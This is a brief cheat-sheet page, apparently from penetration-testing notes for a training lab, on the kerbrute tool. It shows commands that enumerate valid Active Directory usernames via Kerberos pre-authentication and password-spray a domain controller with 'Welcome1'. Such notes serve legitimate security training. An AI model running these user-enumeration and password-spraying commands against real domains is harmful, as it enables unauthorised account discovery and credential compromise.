kerbrute

This tool is designed to assist in quickly bruteforcing valid Active Directory accounts through Kerberos Pre-Authentication.

sudo cp kerbrute_linux_amd64 /usr/local/bin/kerbrute
cd ~/kerbrute/dist

kerbrute userenum -d INLANEFREIGHT.LOCAL --dc 172.16.5.5 jsmith.txt -o valid_ad_users

./kerbrute_linux_amd64 userenum -d INLANEFREIGHT.LOCAL --dc 172.16.5.5 jsmith.txt -o valid_ad_users
# It will enumerate available usernames
kerbrute userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt 
# This will password spray the pass "Welcome1" with the users.txt
# You can make a user txt file with enum4linux
kerbrute passwordspray -d inlanefreight.local --dc 172.16.5.5 valid_users.txt  Welcome1
Previousbloodhound-pythonNexttcpdump

Last updated